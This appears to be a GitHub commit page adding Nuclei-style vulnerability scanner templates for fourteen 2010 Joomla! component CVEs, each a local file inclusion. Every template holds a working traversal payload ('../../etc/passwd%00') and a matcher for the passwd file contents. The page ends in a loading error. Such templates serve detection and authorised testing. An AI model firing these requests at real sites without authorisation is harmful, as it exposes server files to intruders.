-
Notifications
You must be signed in to change notification settings - Fork 20
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
daffainfo
committed
Sep 17, 2021
1 parent
2937fc2
commit 3a091d3
Showing
109 changed files
with
1,156 additions
and
14 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,27 @@ | ||
| id: CVE-2010-1307 | ||
|
|
||
| info: | ||
| name: Joomla! Component Magic Updater - Local File Inclusion | ||
| author: daffainfo | ||
| severity: high | ||
| description: Directory traversal vulnerability in the Magic Updater (com_joomlaupdater) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. | ||
| reference: | ||
| - https://www.exploit-db.com/exploits/12070 | ||
| - https://www.cvedetails.com/cve/CVE-2010-1307 | ||
| tags: cve,cve2010,joomla,lfi | ||
|
|
||
| requests: | ||
| - method: GET | ||
| path: | ||
| - "{{BaseURL}}/index.php?option=com_joomlaupdater&controller=../../../../../../../etc/passwd%00" | ||
|
|
||
| matchers-condition: and | ||
| matchers: | ||
|
|
||
| - type: regex | ||
| regex: | ||
| - "root:.*:0:0" | ||
|
|
||
| - type: status | ||
| status: | ||
| - 200 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,27 @@ | ||
| id: CVE-2010-1308 | ||
|
|
||
| info: | ||
| name: Joomla! Component SVMap 1.1.1 - Local File Inclusion | ||
| author: daffainfo | ||
| severity: high | ||
| description: Directory traversal vulnerability in the SVMap (com_svmap) component 1.1.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. | ||
| reference: | ||
| - https://www.exploit-db.com/exploits/12066 | ||
| - https://www.cvedetails.com/cve/CVE-2010-1308 | ||
| tags: cve,cve2010,joomla,lfi | ||
|
|
||
| requests: | ||
| - method: GET | ||
| path: | ||
| - "{{BaseURL}}/index.php?option=com_svmap&controller=../../../../../../../etc/passwd%00" | ||
|
|
||
| matchers-condition: and | ||
| matchers: | ||
|
|
||
| - type: regex | ||
| regex: | ||
| - "root:.*:0:0" | ||
|
|
||
| - type: status | ||
| status: | ||
| - 200 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,27 @@ | ||
| id: CVE-2010-1312 | ||
|
|
||
| info: | ||
| name: Joomla! Component News Portal 1.5.x - Local File Inclusion | ||
| author: daffainfo | ||
| severity: high | ||
| description: Directory traversal vulnerability in the iJoomla News Portal (com_news_portal) component 1.5.x for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. | ||
| reference: | ||
| - https://www.exploit-db.com/exploits/12077 | ||
| - https://www.cvedetails.com/cve/CVE-2010-1312 | ||
| tags: cve,cve2010,joomla,lfi | ||
|
|
||
| requests: | ||
| - method: GET | ||
| path: | ||
| - "{{BaseURL}}/index.php?option=com_news_portal&controller=../../../../../../../../../../etc/passwd%00" | ||
|
|
||
| matchers-condition: and | ||
| matchers: | ||
|
|
||
| - type: regex | ||
| regex: | ||
| - "root:.*:0:0" | ||
|
|
||
| - type: status | ||
| status: | ||
| - 200 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,27 @@ | ||
| id: CVE-2010-1313 | ||
|
|
||
| info: | ||
| name: Joomla! Component Saber Cart 1.0.0.12 - Local File Inclusion | ||
| author: daffainfo | ||
| severity: high | ||
| description: Directory traversal vulnerability in the Seber Cart (com_sebercart) component 1.0.0.12 and 1.0.0.13 for Joomla!, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php. | ||
| reference: | ||
| - https://www.exploit-db.com/exploits/12082 | ||
| - https://www.cvedetails.com/cve/CVE-2010-1313 | ||
| tags: cve,cve2010,joomla,lfi | ||
|
|
||
| requests: | ||
| - method: GET | ||
| path: | ||
| - "{{BaseURL}}/index.php?option=com_sebercart&view=../../../../../../../../../../etc/passwd%00" | ||
|
|
||
| matchers-condition: and | ||
| matchers: | ||
|
|
||
| - type: regex | ||
| regex: | ||
| - "root:.*:0:0" | ||
|
|
||
| - type: status | ||
| status: | ||
| - 200 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,27 @@ | ||
| id: CVE-2010-1352 | ||
|
|
||
| info: | ||
| name: Joomla! Component Juke Box 1.7 - Local File Inclusion | ||
| author: daffainfo | ||
| severity: high | ||
| description: Directory traversal vulnerability in the JOOFORGE Jutebox (com_jukebox) component 1.0 and 1.7 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. | ||
| reference: | ||
| - https://www.exploit-db.com/exploits/12084 | ||
| - https://www.cvedetails.com/cve/CVE-2010-1352 | ||
| tags: cve,cve2010,joomla,lfi | ||
|
|
||
| requests: | ||
| - method: GET | ||
| path: | ||
| - "{{BaseURL}}/index.php?option=com_jukebox&controller=../../../../../../../../../../etc/passwd%00" | ||
|
|
||
| matchers-condition: and | ||
| matchers: | ||
|
|
||
| - type: regex | ||
| regex: | ||
| - "root:.*:0:0" | ||
|
|
||
| - type: status | ||
| status: | ||
| - 200 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,27 @@ | ||
| id: CVE-2010-1470 | ||
|
|
||
| info: | ||
| name: Joomla! Component Web TV 1.0 - Local File Inclusion | ||
| author: daffainfo | ||
| severity: high | ||
| description: Directory traversal vulnerability in the Web TV (com_webtv) component 1.0 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. | ||
| reference: | ||
| - https://www.exploit-db.com/exploits/12166 | ||
| - https://www.cvedetails.com/cve/CVE-2010-1470 | ||
| tags: cve,cve2010,joomla,lfi | ||
|
|
||
| requests: | ||
| - method: GET | ||
| path: | ||
| - "{{BaseURL}}/index.php?option=com_webtv&controller=../../../../../../../../../../etc/passwd%00" | ||
|
|
||
| matchers-condition: and | ||
| matchers: | ||
|
|
||
| - type: regex | ||
| regex: | ||
| - "root:.*:0:0" | ||
|
|
||
| - type: status | ||
| status: | ||
| - 200 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,27 @@ | ||
| id: CVE-2010-1472 | ||
|
|
||
| info: | ||
| name: Joomla! Component Horoscope 1.5.0 - Local File Inclusion | ||
| author: daffainfo | ||
| severity: high | ||
| description: Directory traversal vulnerability in the Daily Horoscope (com_horoscope) component 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. | ||
| reference: | ||
| - https://www.exploit-db.com/exploits/12167 | ||
| - https://www.cvedetails.com/cve/CVE-2010-1472 | ||
| tags: cve,cve2010,joomla,lfi | ||
|
|
||
| requests: | ||
| - method: GET | ||
| path: | ||
| - "{{BaseURL}}/index.php?option=com_horoscope&controller=../../../../../../../../../../etc/passwd%00" | ||
|
|
||
| matchers-condition: and | ||
| matchers: | ||
|
|
||
| - type: regex | ||
| regex: | ||
| - "root:.*:0:0" | ||
|
|
||
| - type: status | ||
| status: | ||
| - 200 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,27 @@ | ||
| id: CVE-2010-1473 | ||
|
|
||
| info: | ||
| name: Joomla! Component Advertising 0.25 - Local File Inclusion | ||
| author: daffainfo | ||
| severity: high | ||
| description: Directory traversal vulnerability in the Advertising (com_advertising) component 0.25 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. | ||
| reference: | ||
| - https://www.exploit-db.com/exploits/12171 | ||
| - https://www.cvedetails.com/cve/CVE-2010-1473 | ||
| tags: cve,cve2010,joomla,lfi | ||
|
|
||
| requests: | ||
| - method: GET | ||
| path: | ||
| - "{{BaseURL}}/index.php?option=com_advertising&controller=../../../../../../../../../../etc/passwd%00" | ||
|
|
||
| matchers-condition: and | ||
| matchers: | ||
|
|
||
| - type: regex | ||
| regex: | ||
| - "root:.*:0:0" | ||
|
|
||
| - type: status | ||
| status: | ||
| - 200 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,27 @@ | ||
| id: CVE-2010-1476 | ||
|
|
||
| info: | ||
| name: Joomla! Component AlphaUserPoints 1.5.5 - Local File Inclusion | ||
| author: daffainfo | ||
| severity: high | ||
| description: Directory traversal vulnerability in the AlphaUserPoints (com_alphauserpoints) component 1.5.5 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the view parameter to index.php. | ||
| reference: | ||
| - https://www.exploit-db.com/exploits/12150 | ||
| - https://www.cvedetails.com/cve/CVE-2010-1476 | ||
| tags: cve,cve2010,joomla,lfi | ||
|
|
||
| requests: | ||
| - method: GET | ||
| path: | ||
| - "{{BaseURL}}/index.php?option=com_alphauserpoints&view=../../../../../../../../../../etc/passwd%00" | ||
|
|
||
| matchers-condition: and | ||
| matchers: | ||
|
|
||
| - type: regex | ||
| regex: | ||
| - "root:.*:0:0" | ||
|
|
||
| - type: status | ||
| status: | ||
| - 200 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,27 @@ | ||
| id: CVE-2010-1531 | ||
|
|
||
| info: | ||
| name: Joomla! Component redSHOP 1.0 - Local File Inclusion | ||
| author: daffainfo | ||
| severity: high | ||
| description: Directory traversal vulnerability in the redSHOP (com_redshop) component 1.0.x for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php. | ||
| reference: | ||
| - https://www.exploit-db.com/exploits/12054 | ||
| - https://www.cvedetails.com/cve/CVE-2010-1531 | ||
| tags: cve,cve2010,joomla,lfi | ||
|
|
||
| requests: | ||
| - method: GET | ||
| path: | ||
| - "{{BaseURL}}/index.php?option=com_redshop&view=../../../../../../../../../../../../../../../etc/passwd%00" | ||
|
|
||
| matchers-condition: and | ||
| matchers: | ||
|
|
||
| - type: regex | ||
| regex: | ||
| - "root:.*:0:0" | ||
|
|
||
| - type: status | ||
| status: | ||
| - 200 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,27 @@ | ||
| id: CVE-2010-1534 | ||
|
|
||
| info: | ||
| name: Joomla! Component Shoutbox Pro - Local File Inclusion | ||
| author: daffainfo | ||
| severity: high | ||
| description: Directory traversal vulnerability in the Shoutbox Pro (com_shoutbox) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. | ||
| reference: | ||
| - https://www.exploit-db.com/exploits/12067 | ||
| - https://www.cvedetails.com/cve/CVE-2010-1534 | ||
| tags: cve,cve2010,joomla,lfi | ||
|
|
||
| requests: | ||
| - method: GET | ||
| path: | ||
| - "{{BaseURL}}/index.php?option=com_shoutbox&controller=../../../../../../../etc/passwd%00" | ||
|
|
||
| matchers-condition: and | ||
| matchers: | ||
|
|
||
| - type: regex | ||
| regex: | ||
| - "root:.*:0:0" | ||
|
|
||
| - type: status | ||
| status: | ||
| - 200 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,27 @@ | ||
| id: CVE-2010-1607 | ||
|
|
||
| info: | ||
| name: Joomla! Component WMI 1.5.0 - Local File Inclusion | ||
| author: daffainfo | ||
| severity: high | ||
| description: Directory traversal vulnerability in wmi.php in the Webmoney Web Merchant Interface (aka WMI or com_wmi) component 1.5.0 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. | ||
| reference: | ||
| - https://www.exploit-db.com/exploits/12316 | ||
| - https://www.cvedetails.com/cve/CVE-2010-1607 | ||
| tags: cve,cve2010,joomla,lfi | ||
|
|
||
| requests: | ||
| - method: GET | ||
| path: | ||
| - "{{BaseURL}}/index.php?option=com_wmi&controller=../../../../../../../../../etc/passwd%00" | ||
|
|
||
| matchers-condition: and | ||
| matchers: | ||
|
|
||
| - type: regex | ||
| regex: | ||
| - "root:.*:0:0" | ||
|
|
||
| - type: status | ||
| status: | ||
| - 200 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,27 @@ | ||
| id: CVE-2010-1719 | ||
|
|
||
| info: | ||
| name: Joomla! Component MT Fire Eagle 1.2 - Local File Inclusion | ||
| author: daffainfo | ||
| severity: high | ||
| description: Directory traversal vulnerability in the MT Fire Eagle (com_mtfireeagle) component 1.2 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. | ||
| reference: | ||
| - https://www.exploit-db.com/exploits/12233 | ||
| - https://www.cvedetails.com/cve/CVE-2010-1719 | ||
| tags: cve,cve2010,joomla,lfi | ||
|
|
||
| requests: | ||
| - method: GET | ||
| path: | ||
| - "{{BaseURL}}/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../etc/passwd%00" | ||
|
|
||
| matchers-condition: and | ||
| matchers: | ||
|
|
||
| - type: regex | ||
| regex: | ||
| - "root:.*:0:0" | ||
|
|
||
| - type: status | ||
| status: | ||
| - 200 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,27 @@ | ||
| id: CVE-2010-1723 | ||
|
|
||
| info: | ||
| name: Joomla! Component iNetLanka Contact Us Draw Root Map 1.1 - Local File Inclusion | ||
| author: daffainfo | ||
| severity: high | ||
| description: Directory traversal vulnerability in the iNetLanka Contact Us Draw Root Map (com_drawroot) component 1.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. | ||
| reference: | ||
| - https://www.exploit-db.com/exploits/12289 | ||
| - https://www.cvedetails.com/cve/CVE-2010-1723 | ||
| tags: cve,cve2010,joomla,lfi | ||
|
|
||
| requests: | ||
| - method: GET | ||
| path: | ||
| - "{{BaseURL}}/index.php?option=com_drawroot&controller=../../../../../../../../../../etc/passwd%00" | ||
|
|
||
| matchers-condition: and | ||
| matchers: | ||
|
|
||
| - type: regex | ||
| regex: | ||
| - "root:.*:0:0" | ||
|
|
||
| - type: status | ||
| status: | ||
| - 200 |
Oops, something went wrong.